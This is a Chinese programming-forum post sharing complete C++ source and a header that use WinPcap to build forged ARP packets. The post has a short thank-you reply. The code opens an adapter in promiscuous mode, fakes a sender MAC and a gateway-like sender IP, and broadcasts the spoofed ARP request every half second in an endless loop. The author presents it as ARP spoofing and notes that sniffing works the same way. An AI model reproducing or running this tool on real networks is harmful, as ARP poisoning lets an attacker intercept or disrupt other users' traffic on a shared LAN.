设为首页收藏本站
切换到窄版

鱼C论坛

 找回密码
 立即注册
鱼C论坛»论坛 编程语言专区 C\C++交流 WinPcap实现网络嗅探和ARP欺骗
返回列表 发新帖
查看: 2857|回复: 1

[技术交流] WinPcap实现网络嗅探和ARP欺骗

[复制链接]
sky!
发表于 2014-3-29 00:37:16 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
程序运行需要用到winpcap的驱动.
www.winpcap.org

.cpp文件
  1. #include <iostream>
  2. #include <iomanip>
  3. #include<windows.h>
  4. #include "deal.h"
  5. using namespace std;

  7. void show_ip(ip_address);
  8. void show_mac(unsigned char* mac);
  9. int cmp_ip(ip_address ip1,ip_address ip2);
  10. void formatStrToMAC(const LPSTR lpHWAddrStr, unsigned char *HWAddr);
  11. int same_times=1;
  12. ip_address old_ip;
  13. int ip_store[255];
  14. void show()
  15. {

  17.     WSADATA wsaData;
  18.     int iResult;
  19.         iResult=WSAStartup(MAKEWORD(2,0),&wsaData);
  20.         if(iResult)
  21.     {
  22.        cout<<"WSAStartup fail."<<endl;
  23.     }
  24.     else
  25.     {
  26.         cout<<"WSAStartup finish."<<endl<<endl;
  27.     }
  28.      pcap_if_t *alldevs;
  29.     pcap_if_t *d;
  30.     char errbuf[PCAP_ERRBUF_SIZE+1];
  31.     //char source[PCAP_ERRBUF_SIZE+1];

  33.     int i=0;
  34.     int inum;
  35.     pcap_t *adhandle;
  36.     if(pcap_findalldevs_ex(PCAP_SRC_IF_STRING,NULL,&alldevs,errbuf)==-1){

  38.         cout<<"error in pcap findalldevs ex: "<< errbuf<<endl;
  39.     }
  40.     for(d = alldevs; d != NULL; d = d->next)
  41.     {
  42.         cout<<"deviec "<<++i<<": "<<endl;
  43.         ifprint(d);
  44.     }
  45.       if(i == 0)
  46.     {
  47.         cout<<"\nNo interfaces found! Make sure Winpcap is installed.\n";
  48.     }

  50.     cout<<"please enter the interface number: "<<endl;
  51.     cin>>inum;
  52.     cout<<"you choose: "<<inum<<endl;

  54.     if(inum < 1 || inum > i)
  55.     {
  56.         printf("\nInterface number out of range.\n");
  57.         /* 释放设备列表 */
  58.         pcap_freealldevs(alldevs);
  59.         return;
  60.     }
  61.     for(d=alldevs, i=0; i< inum-1 ; d=d->next, i++);
  62.     {
  63.         if ( (adhandle= pcap_open(d->name,          // 设备名
  64.                               100,            // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容
  65.                               PCAP_OPENFLAG_PROMISCUOUS,    // 混杂模式
  66.                               1000,             // 读取超时时间
  67.                               NULL,             // 远程机器验证
  68.                               errbuf            // 错误缓冲池
  69.                              ) ) == NULL)
  70.         {
  71.             fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
  72.             /* 释放设备列表 */
  73.             pcap_freealldevs(alldevs);
  74.             return;
  75.         }
  76.         //获取子网掩码

  78.         //获取本地IP
  79.     }
  80.     tagARPPacket arppacket;
  81.     memset(&arppacket, 0, sizeof(arppacket));


  84.     //formatStrToMAC("00-0c-29-8b-96-e0",arppacket.dlcHeader.DesMac);
  85.     formatStrToMAC("ff-ff-ff-ff-ff-ff",arppacket.DesMac);
  86.     formatStrToMAC("00-97-02-03-03-71",arppacket.SrcMac);

  88.     formatStrToMAC("ff-ff-ff-ff-ff-ff",arppacket.Targ_HW_Addr);
  89.     formatStrToMAC("00-97-02-03-03-71",arppacket.Send_HW_Addr);

  91.     arppacket.Send_Prot_Addr=inet_addr("10.*.*.1");
  92.     arppacket.Targ_Prot_Addr=inet_addr("10.*.*.128");


  95.     arppacket.Opcode=htons((unsigned short)1);

  97.     arppacket.Ethertype = htons((unsigned short)0x0806); // DLC Header的以太网类型
  98.      arppacket.HW_Type = htons((unsigned short)0x0001);           // 硬件类型
  99.      arppacket.Prot_Type = htons((unsigned short)0x0800);    // 上层协议类型
  100.      arppacket.HW_Addr_Len = (unsigned char)6;                 // MAC地址长度
  101.      arppacket.Prot_Addr_Len = (unsigned char)4;               // IP地址长度

  103.      unsigned char *cc;
  104.      cc=(unsigned char *)&arppacket;
  105.      cout<<sizeof(arppacket)<<endl;
  106.      /*for(int i=0;i<sizeof(arppacket);i++)
  107.      {
  108.          //cout<<cc[i];
  109.          cout<<setw(2)<<setfill('0')<<hex<<(unsigned int)cc[i]<<"-";
  110.      }
  111.      cout<<endl<<sizeof(arppacket)<<endl;*/

  113.     while(1)
  114.     {
  115.         if (pcap_sendpacket(adhandle,(UCHAR*) &arppacket, 64) != 0)
  116.         {
  117.             //fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
  118.             cout<<"error"<<endl;
  119.             return;
  120.         }else
  121.         {
  122.             cout<<"finish.\t"<<same_times++<<endl;
  123.         }
  124.         Sleep(500);


  127.     }



  131. }

  133. int cmp_ip(ip_address ip1,ip_address ip2)
  134. {
  135.     if(!((u_int)ip1.byte1^(u_int)ip2.byte1))
  136.     {
  137.         if(!((u_int)ip1.byte2^(u_int)ip2.byte2))
  138.             if(!((u_int)ip1.byte3^(u_int)ip2.byte3))
  139.                 if(!((u_int)ip1.byte4^(u_int)ip2.byte4))
  140.                     return 0;
  141.     }
  142.     return 1;

  144. }
  145. void show_ip(ip_address ip_add)
  146. {
  147.     cout<<(u_int)ip_add.byte1<<"."<<(u_int)ip_add.byte2<<"."<<(u_int)ip_add.byte3<<"."<<(u_int)ip_add.byte4;
  148. }
  149. void show_mac(unsigned char* mac)
  150. {
  151.     ios::fmtflags old(cout.flags());

  153.     for(int i=0;i<5;i++)
  154.     {
  155.         cout<<setw(2)<<setfill('0')<<hex<<(unsigned int)mac[i]<<"-";
  156.     }
  157.     cout<<hex<<(unsigned int)mac[5];

  159.     cout.flags(old);
  160. }
  161. void ifprint(pcap_if_t *d)
  162. {
  163.     pcap_addr_t *a;
  164.   char ip6str[128];

  166.   /* 设备名(Name) */

  168.     cout<<d->name<<endl;
  169.   /* 设备描述(Description) */
  170.   if (d->description)

  172.     cout<<"\tDescription: "<<d->description<<endl;
  173.   /* Loopback Address*/
  174.   printf("\tLoopback: %s\n",(d->flags & PCAP_IF_LOOPBACK)?"yes":"no");

  176.   /* IP addresses */
  177.   for(a=d->addresses;a;a=a->next) {
  178.     printf("\tAddress Family: #%d\n",a->addr->sa_family);

  180.     switch(a->addr->sa_family)
  181.     {
  182.       case AF_INET:
  183.         printf("\tAddress Family Name: AF_INET\n");
  184.         if (a->addr)
  185.           printf("\tAddress: %s\n",iptos(((struct sockaddr_in *)a->addr)->sin_addr.s_addr));
  186.         if (a->netmask)
  187.           printf("\tNetmask: %s\n",iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
  188.         if (a->broadaddr)
  189.           printf("\tBroadcast Address: %s\n",iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
  190.         if (a->dstaddr)
  191.           printf("\tDestination Address: %s\n",iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
  192.         break;

  194.       case AF_INET6:
  195.         printf("\tAddress Family Name: AF_INET6\n");
  196.         if (a->addr)
  197.           printf("\tAddress: %s\n", ip6tos(a->addr, ip6str, sizeof(ip6str)));
  198.        break;

  200.       default:
  201.         printf("\tAddress Family Name: Unknown\n");
  202.         break;
  203.     }
  204.   }
  205.   printf("\n");
  206. }

  208. #define IPTOSBUFFERS    12
  209. char *iptos(u_long in)
  210. {
  211.     static char output[IPTOSBUFFERS][3*4+3+1];
  212.     static short which;
  213.     u_char *p;

  215.     p = (u_char *)∈
  216.     which = (which + 1 == IPTOSBUFFERS ? 0 : which + 1);
  217.     sprintf(output[which], "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
  218.     return output[which];
  219. }

  221. char* ip6tos(struct sockaddr *sockaddr, char *address, int addrlen)
  222. {
  223.     socklen_t sockaddrlen;

  225.     #ifdef WIN32
  226.     sockaddrlen = sizeof(struct sockaddr_in6);
  227.     #else
  228.     sockaddrlen = sizeof(struct sockaddr_storage);
  229.     #endif


  232.     if(getnameinfo(sockaddr,
  233.         sockaddrlen,
  234.         address,
  235.         addrlen,
  236.         NULL,
  237.         0,
  238.         NI_NUMERICHOST) != 0) address = NULL;

  240.     return address;
  241. }
  242. void formatStrToMAC(const LPSTR lpHWAddrStr, unsigned char *HWAddr)
  243. {
  244.        unsigned int i, index = 0, value, temp;
  245.       unsigned char c;

  247.       _strlwr(lpHWAddrStr);                                                   // 转换成小写

  249.       for (i = 0; i < strlen(lpHWAddrStr); i++)
  250.      {
  251.            c = *(lpHWAddrStr + i);
  252.             if (( c>='0' && c<='9' ) || ( c>='a' && c<='f' ))
  253.            {
  254.                if (c>='0' && c<='9')  temp = c - '0';                         // 数字
  255.                if (c>='a' && c<='f')  temp = c - 'a' + 0xa;               // 字母
  256.                if ( (index % 2) == 1 )
  257.               {
  258.                    value = value*0x10 + temp;
  259.                    HWAddr[index/2] = value;
  260.               }
  261.               else value = temp;
  262.               index++;
  263.          }
  264.                if (index == 12) break;
  265.         }
  266. }
复制代码
头文件:
  1. #ifndef DEAL_H_INCLUDED
  2. #define DEAL_H_INCLUDED

  4. #define WINVER 0x0501
  5. #include <ws2tcpip.h>
  6. #include <WinSock2.h>
  7. #define HAVE_REMOTE
  8. #include "pcap.h"

  10. void ifprint(pcap_if_t *d);
  11. char *iptos(u_long in);
  12. char* ip6tos(struct sockaddr *sockaddr, char *address, int addrlen);
  13. void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data);
  14. void show();

  16. struct ip_address
  17. {
  18.     u_char byte1;
  19.     u_char byte2;
  20.     u_char byte3;
  21.     u_char byte4;
  22. };
  23. #pragma pack(push)
  24. #pragma pack(1)
  25. struct ip_header{
  26.     u_char  ver_ihl;        // 版本 (4 bits) + 首部长度 (4 bits)
  27.     u_char  tos;            // 服务类型(Type of service)
  28.     u_short tlen;           // 总长(Total length)
  29.     u_short identification; // 标识(Identification)
  30.     u_short flags_fo;       // 标志位(Flags) (3 bits) + 段偏移量(Fragment offset) (13 bits)
  31.     u_char  ttl;            // 存活时间(Time to live)
  32.     u_char  proto;          // 协议(Protocol)
  33.     u_short crc;            // 首部校验和(Header checksum)
  34.     ip_address  saddr;      // 源地址(Source address)
  35.     ip_address  daddr;      // 目的地址(Destination address)
  36.     u_int   op_pad;         // 选项与填充(Option + Padding)
  37. };
  38. struct tagDLCHeader{

  40.     unsigned char DesMac[6];
  41.     unsigned char SrcMac[6];
  42.     unsigned short Ethertype;
  43. };
  44. struct tagARPFrame{
  45.     unsigned short         HW_Type;           /* hardware address */
  46.     unsigned short         Prot_Type;             /* protocol address */
  47.     unsigned char      HW_Addr_Len;       /* length of hardware address */
  48.     unsigned char      Prot_Addr_Len;         /* length of protocol address */
  49.     unsigned short         Opcode;                /* ARP/RARP */

  51.     unsigned char      Send_HW_Addr[6];     /* sender hardware address */
  52.     unsigned long      Send_Prot_Addr;      /* sender protocol address */
  53.     unsigned char      Targ_HW_Addr[6];     /* target hardware address */
  54.     unsigned long      Targ_Prot_Addr;      /* target protocol address */
  55.     unsigned char      padding[18];
  56. };

  58. struct tagARPPacket{
  59.     unsigned char DesMac[6];
  60.     unsigned char SrcMac[6];
  61.     unsigned short Ethertype;
  62.     unsigned short         HW_Type;           /* hardware address */
  63.     unsigned short         Prot_Type;             /* protocol address */
  64.     unsigned char      HW_Addr_Len;       /* length of hardware address */
  65.     unsigned char      Prot_Addr_Len;         /* length of protocol address */
  66.     unsigned short         Opcode;                /* ARP/RARP */
  67.     unsigned char      Send_HW_Addr[6];     /* sender hardware address */
  68.     unsigned long      Send_Prot_Addr;      /* sender protocol address */
  69.     unsigned char      Targ_HW_Addr[6];     /* target hardware address */
  70.     unsigned long      Targ_Prot_Addr;      /* target protocol address */
  71.     unsigned char      padding[18];
  72. };
  73. #pragma pack(pop)
  74. #endif // DEAL_H_INCLUDED
复制代码
在main函数里运行show() 即可实现ARP包的发送, ARP技术属于黑科技......在此以和谐为主

用pcap_loop相关函数 可实现网卡嗅探...原理同上..


晚安.


小甲鱼最新课程 -> https://ilovefishc.com
回复

使用道具 举报

Angel丶L
发表于 2014-7-21 22:12:29 | 显示全部楼层
支持了谢谢分享哈,
小甲鱼最新课程 -> https://ilovefishc.com
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2025-6-10 14:34

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表